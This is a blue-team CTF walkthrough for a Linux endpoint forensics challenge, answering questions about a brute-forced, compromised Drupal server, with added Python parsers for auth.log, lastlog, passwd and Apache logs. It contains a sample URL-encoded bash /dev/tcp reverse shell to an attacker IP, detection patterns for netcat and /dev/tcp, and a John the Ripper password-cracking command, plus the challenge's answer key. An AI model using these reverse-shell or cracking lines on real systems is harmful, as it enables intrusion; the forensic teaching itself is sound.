Category : Endpoint Forensics (Linux)
LEVEL : Medium
Challenge DownLoad Link : https://cyberdefenders.org/blueteam-ctf-challenges/enroll/71
Instructions:
- Uncompress the challenge (pass: cyberdefenders.org)
Scenario :
A SOC analyst has been called to analyze a compromised Linux web server. Figure out how the threat actor gained access, what modifications were applied to the system, and what persistence techniques were utilized (e.g. backdoors, users, sessions, etc.).
Tools: FTK, John the Ripper, CyberChef
Q1-What is the system timezone?
- First, open the challenge image with FTK:
- Then go to /root/etc/timezone and open the file:
THE ANSWER : Europe/Brussels
Q2-Who was the last user to log in to the system?
- Go to /root/var/log/auth.log and scroll to the last login entry:
THE ANSWER : mail
Q3-What was the source port the user ‘mail’ connected from?
- From the same file (auth.log), the "Accepted password" line for the user mail records the source IP and port:
THE ANSWER : 57708
Q4-How long was the last session for user ‘mail’? (Minutes only)
- In auth.log, the last session for the user mail opened at Oct 5 13:23:39 and closed at Oct 5 13:24:11, about 32 seconds, which rounds to one minute:
THE ANSWER : 1
Q5-Which server service did the last user use to log in to the system?
- In auth.log the successful login is an "Accepted password" line written by sshd,
so the attacker used the SSH service:
THE ANSWER : sshd
Q6-What type of authentication attack was performed against the target machine?
- Open auth.log and grep for "Failed password": there is a large number of failed SSH login attempts from the same source in a short time, followed by the successful login, which is the signature of a brute-force attack.
THE ANSWER : brute-force
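The auth.log checks from Q2 to Q6 (last accepted login, its source port, session length, the service, and the brute-force pattern) can be scripted instead of read by eye. The following is an added example in Python, not code from the walkthrough or the challenge. The log excerpt is constructed for the example: it reuses the values the walkthrough reports (user mail, 192.168.210.131, port 57708, session 13:23:39 to 13:24:11) but the failed-password lines are made up, and since auth.log carries no year the parser assumes one.

```python
import math
import re
from datetime import datetime

# Constructed sample auth.log excerpt (not the challenge's real log). Values
# mirror the walkthrough; the failed attempts are invented to show the pattern.
SAMPLE_AUTH_LOG = """\
Oct  5 13:21:01 web sshd[2100]: Failed password for invalid user admin from 192.168.210.131 port 57601 ssh2
Oct  5 13:21:02 web sshd[2102]: Failed password for invalid user admin from 192.168.210.131 port 57602 ssh2
Oct  5 13:21:03 web sshd[2104]: Failed password for root from 192.168.210.131 port 57603 ssh2
Oct  5 13:21:04 web sshd[2106]: Failed password for mail from 192.168.210.131 port 57604 ssh2
Oct  5 13:23:39 web sshd[2230]: Accepted password for mail from 192.168.210.131 port 57708 ssh2
Oct  5 13:23:39 web sshd[2230]: pam_unix(sshd:session): session opened for user mail by (uid=0)
Oct  5 13:24:11 web sshd[2230]: pam_unix(sshd:session): session closed for user mail
"""

LOG_LINE = re.compile(r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ (?P<proc>[\w-]+)\[\d+\]: (?P<msg>.*)$")
ACCEPTED = re.compile(r"Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)")
FAILED = re.compile(r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+")
SESSION = re.compile(r"session (?P<state>opened|closed) for user (?P<user>\S+)")


def _parse_ts(ts, year=2014):
    """auth.log timestamps have no year; the year is an assumption supplied by the caller."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def parse_lines(text):
    """Yield (timestamp, process name, message) for each well-formed syslog line."""
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m:
            yield _parse_ts(m["ts"]), m["proc"], m["msg"]


def accepted_logins(text):
    """All successful logins in order: who, from where, via which service."""
    logins = []
    for ts, proc, msg in parse_lines(text):
        m = ACCEPTED.search(msg)
        if m:
            logins.append({"time": ts, "service": proc, "method": m["method"],
                           "user": m["user"], "ip": m["ip"], "port": int(m["port"])})
    return logins


def last_login(text):
    logins = accepted_logins(text)
    return logins[-1] if logins else None


def session_seconds(text, user):
    """Length of the user's last completed PAM session (opened -> closed), in seconds."""
    opened = duration = None
    for ts, _, msg in parse_lines(text):
        m = SESSION.search(msg)
        if not m or m["user"] != user:
            continue
        if m["state"] == "opened":
            opened = ts
        elif opened is not None:
            duration = (ts - opened).total_seconds()
            opened = None
    return duration


def session_minutes(text, user):
    """Session length rounded up to whole minutes (a 32 s session counts as 1)."""
    secs = session_seconds(text, user)
    return None if secs is None else math.ceil(secs / 60)


def failed_attempts_by_ip(text):
    counts = {}
    for _, _, msg in parse_lines(text):
        m = FAILED.search(msg)
        if m:
            counts[m["ip"]] = counts.get(m["ip"], 0) + 1
    return counts


def bruteforce_sources(text, threshold=3):
    """Source IPs with at least `threshold` failed passwords that later got an Accepted login."""
    failed = failed_attempts_by_ip(text)
    accepted = {login["ip"] for login in accepted_logins(text)}
    return sorted(ip for ip, n in failed.items() if n >= threshold and ip in accepted)


if __name__ == "__main__":
    print(last_login(SAMPLE_AUTH_LOG))
    print(session_seconds(SAMPLE_AUTH_LOG, "mail"), "s")
    print(bruteforce_sources(SAMPLE_AUTH_LOG))
```

Run it against the extracted auth.log by reading the file into `text`; on a real log, check whether the file rotated (auth.log.1, auth.log.2.gz) so the failed attempts preceding the accepted login are not missed.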
Q7-How many IP addresses are listed in the ‘/var/log/lastlog’ file?
- Open the lastlog file (it is a binary file with one fixed-size record per UID, so count the distinct hosts in the records that are populated):
THE ANSWER : 2
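/var/log/lastlog is not text: on glibc/Linux each record is a 32-bit timestamp, a 32-byte tty name and a 256-byte host, 292 bytes in total, stored at offset UID * 292, with all-zero records for users who never logged in. The following added example (Python, not code from the walkthrough) parses such a file and lists the distinct hosts; the sample file bytes are constructed for the example with made-up hosts and timestamps, and the little-endian 32-bit layout is assumed (it is what x86/x86-64 Linux writes).

```python
import struct
from datetime import datetime, timezone

# struct lastlog on glibc/Linux: int32 ll_time, char ll_line[32], char ll_host[256].
LASTLOG_FMT = "<i32s256s"          # little-endian, as written by x86/x86-64 Linux
LASTLOG_SIZE = struct.calcsize(LASTLOG_FMT)   # 292 bytes per record


def _record(ts, line, host):
    """Build one raw lastlog record (struct.pack zero-pads the fixed-size strings)."""
    return struct.pack(LASTLOG_FMT, ts, line.encode(), host.encode())


# Constructed sample file (not the challenge's real lastlog): UIDs 0..1000,
# with logins recorded only for UID 8 and UID 1000; hosts and times are made up.
SAMPLE_LASTLOG = (
    _record(0, "", "") * 8                              # UIDs 0-7 never logged in
    + _record(1412512000, "pts/0", "192.168.210.131")   # UID 8
    + b"\x00" * (LASTLOG_SIZE * (1000 - 9))             # UIDs 9-999 never logged in
    + _record(1412500000, "pts/1", "192.168.210.130")   # UID 1000
)


def parse_lastlog(data):
    """Return populated records as dicts; the record index is the UID."""
    entries = []
    for uid in range(len(data) // LASTLOG_SIZE):
        ts, line, host = struct.unpack_from(LASTLOG_FMT, data, uid * LASTLOG_SIZE)
        if ts == 0:
            continue   # sparse/zero record: this UID never logged in
        entries.append({
            "uid": uid,
            "time": datetime.fromtimestamp(ts, timezone.utc),
            "line": line.rstrip(b"\x00").decode(errors="replace"),
            "host": host.rstrip(b"\x00").decode(errors="replace"),
        })
    return entries


def lastlog_hosts(data):
    """Distinct non-empty hosts recorded in the file (IPs, or hostnames if sshd resolved them)."""
    return sorted({e["host"] for e in parse_lastlog(data) if e["host"]})


if __name__ == "__main__":
    for e in parse_lastlog(SAMPLE_LASTLOG):
        print(e["uid"], e["time"], e["line"], e["host"])
    print(lastlog_hosts(SAMPLE_LASTLOG))
```

To use it on the evidence, read the extracted file with `open(path, "rb").read()`; map the UIDs back to names through /etc/passwd from the same image, not the analysis host. The host field holds whatever sshd logged, so it can contain a hostname rather than an IP when reverse DNS was enabled.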
Q8-How many users have a login shell?
- Go to /etc/passwd and count the accounts whose last field is a real shell (e.g. /bin/bash or /bin/sh) rather than /usr/sbin/nologin or /bin/false:
THE ANSWER : 5
Q9-What is the password of the mail user?
- First go to /etc/shadow and copy the hash line of the user "mail" into a file named shadow:
- Now use John the Ripper with the rockyou wordlist to recover the password (john --show shadow prints it afterwards):
└─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt shadow
THE ANSWER : forensics
Q10-Which user account was created by the attacker?
- Go to auth.log and grep for "useradd"; account creation is logged there with the new user name:
THE ANSWER : php
Q11-How many user groups exist on the machine?
- Go to /etc/group and count the number of lines (one group per line):
THE ANSWER : 58
Q12-How many users have sudo access?
- Go to /etc/group and look at the sudo line; the members are listed in its last field:
THE ANSWER : 2
Q13-What is the home directory of the PHP user?
- Check /etc/passwd and search for the "php" user; the sixth field is the home directory:
THE ANSWER : /usr/php
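Q8, Q11, Q12 and Q13 all come from /etc/passwd and /etc/group, so one parser answers all of them. The following is an added example in Python, not the walkthrough's own code; the passwd, group and shells fragments are constructed for the example (they reuse the names mail and php from the walkthrough, but the other accounts and UIDs are made up). A "login shell" is taken to mean a shell listed in /etc/shells, which is why /bin/sync is not counted.

```python
# Constructed sample files (not the challenge's real /etc/passwd, /etc/group, /etc/shells).
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/mail:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
analyst:x:1000:1000:analyst,,,:/home/analyst:/bin/bash
php:x:1001:1001::/usr/php:/bin/bash
"""
SAMPLE_GROUP = """\
root:x:0:
daemon:x:1:
mail:x:8:
sudo:x:27:analyst,php
www-data:x:33:
php:x:1001:
"""
SAMPLE_SHELLS = """\
# /etc/shells: valid login shells
/bin/sh
/bin/bash
/bin/dash
"""


def parse_passwd(text):
    """name -> {uid, gid, gecos, home, shell}; skips blank and comment lines."""
    users = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, uid, gid, gecos, home, shell = line.split(":", 6)
        users[name] = {"uid": int(uid), "gid": int(gid), "gecos": gecos,
                       "home": home, "shell": shell}
    return users


def parse_group(text):
    """name -> {gid, members}; members is the comma-separated last field."""
    groups = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _pw, gid, members = line.split(":", 3)
        groups[name] = {"gid": int(gid), "members": [m for m in members.split(",") if m]}
    return groups


def parse_shells(text):
    return {l.strip() for l in text.splitlines() if l.strip() and not l.startswith("#")}


def login_shell_users(passwd_text, shells_text):
    """Accounts whose shell is a valid login shell per /etc/shells."""
    shells = parse_shells(shells_text)
    return sorted(n for n, u in parse_passwd(passwd_text).items() if u["shell"] in shells)


def group_members(passwd_text, group_text, group_name):
    """Members of a group, including users whose primary GID is that group
    (they never appear in the /etc/group member list)."""
    groups = parse_group(group_text)
    if group_name not in groups:
        return []
    g = groups[group_name]
    members = set(g["members"])
    members.update(n for n, u in parse_passwd(passwd_text).items() if u["gid"] == g["gid"])
    return sorted(members)


def home_dir(passwd_text, user):
    return parse_passwd(passwd_text).get(user, {}).get("home")


def group_count(group_text):
    return len(parse_group(group_text))


if __name__ == "__main__":
    print("login shells:", login_shell_users(SAMPLE_PASSWD, SAMPLE_SHELLS))
    print("groups:", group_count(SAMPLE_GROUP))
    print("sudo:", group_members(SAMPLE_PASSWD, SAMPLE_GROUP, "sudo"))
    print("php home:", home_dir(SAMPLE_PASSWD, "php"))
```

The sudo group is only one source of privilege: also read /etc/sudoers and /etc/sudoers.d/* from the image for per-user or per-group rules, since an attacker-added account may be granted sudo there without ever being added to the group.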
Q14-What command did the attacker use to gain root privilege? (Answer contains two spaces).
- The mail user's home directory is /var/mail, so go to /var/mail/.bash_history:
THE ANSWER : sudo su -
Q15-Which file did the user ‘root’ delete?
- Go to /root/.bash_history and look for the rm command:
THE ANSWER : 37292.c
Q16-Recover the deleted file, open it and extract the exploit author name.
- After some time searching different directories, I found a copy of this suspicious file in /tmp, and once I clicked it, Microsoft Defender alerted me:
Now look the file up on Exploit-DB (the file name 37292.c is its EDB-ID); the author is named in the exploit's header comment:
THE ANSWER : rebel
Q17-What is the content management system (CMS) installed on the machine?
- Go to /var/www/html/jabc/index.php and open the file; its header comment names the CMS:
THE ANSWER : drupal
Q18-What is the version of the CMS installed on the machine?
- From the hint, check /var/www/html/includes/bootstrap.inc; open the file and look for the VERSION constant:
THE ANSWER : 7.26
Q19-Which port was listening to receive the attacker’s reverse shell?
- We already know the attacker's IP address from auth.log (Q3): 192.168.210.131.
- Now go to /var/log/apache/access.log and search for requests from this IP address:
- Paste the URL-encoded POST request from the attacker into CyberChef and URL-decode it; the decoded payload shows the IP and port of the attacker's listener:
THE ANSWER : 4444
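The CyberChef step above (filter the access log by the attacker's IP, URL-decode the request, pull the listener out of the payload) can be done in a few lines so it also catches double-encoded or repeated requests. The following is an added example in Python, not code from the walkthrough. The three access.log lines are constructed for the example and are not the challenge's real requests: the payload is a generic bash /dev/tcp reverse shell chosen only to exercise the decoder, and the IP and port simply reuse the walkthrough's values.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access.log (not the challenge's real log). The encoded
# parameter is a generic reverse-shell one-liner used to exercise the decoder.
SAMPLE_ACCESS_LOG = """\
192.168.210.131 - - [05/Oct/2014:13:20:10 +0200] "GET /jabc/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.5 - - [05/Oct/2014:13:21:00 +0200] "GET /jabc/?q=node HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
192.168.210.131 - - [05/Oct/2014:13:22:50 +0200] "POST /jabc/?cmd=bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.210.131%2F4444%200%3E%261 HTTP/1.1" 200 0 "-" "curl/7.35"
"""

# Apache "combined" log format: client, identd, user, [time], "request", status ...
ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
# Common reverse-shell shapes: bash /dev/tcp, netcat, and a python socket.connect().
REVERSE_SHELL = [
    re.compile(rf"/dev/tcp/(?P<ip>{IPV4})/(?P<port>\d{{1,5}})"),
    re.compile(rf"\b(?:nc|ncat|netcat)\b[^;|&]*?\s(?P<ip>{IPV4})\s+(?P<port>\d{{1,5}})"),
    re.compile(rf"connect\(\(?['\"](?P<ip>{IPV4})['\"],\s*(?P<port>\d{{1,5}})"),
]


def decode_requests(text, src_ip=None):
    """Parse access.log lines (optionally only from src_ip) and URL-decode the request target."""
    out = []
    for line in text.splitlines():
        m = ACCESS_LINE.match(line)
        if not m or (src_ip and m["ip"] != src_ip):
            continue
        target = m["target"]
        for _ in range(3):                 # attackers sometimes double-encode
            decoded = unquote_plus(target)
            if decoded == target:
                break
            target = decoded
        out.append({"ip": m["ip"], "time": m["ts"], "method": m["method"],
                    "status": int(m["status"]), "target": target})
    return out


def reverse_shell_listeners(text, src_ip=None):
    """Listener IP/port pairs found in decoded requests, with the request time."""
    hits = []
    for req in decode_requests(text, src_ip):
        for pat in REVERSE_SHELL:
            for m in pat.finditer(req["target"]):
                hits.append({"time": req["time"], "method": req["method"],
                             "listener": m["ip"], "port": int(m["port"])})
    return hits


if __name__ == "__main__":
    for req in decode_requests(SAMPLE_ACCESS_LOG, "192.168.210.131"):
        print(req["time"], req["method"], req["target"])
    print(reverse_shell_listeners(SAMPLE_ACCESS_LOG, "192.168.210.131"))
```

Apache only logs the request line, so a payload carried in a POST body never appears in access.log; when the decoded query shows nothing, look at the web shell or the PHP error log instead, and correlate the request time with the session timestamps in auth.log.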
THE END
BY : Ahmed Nasser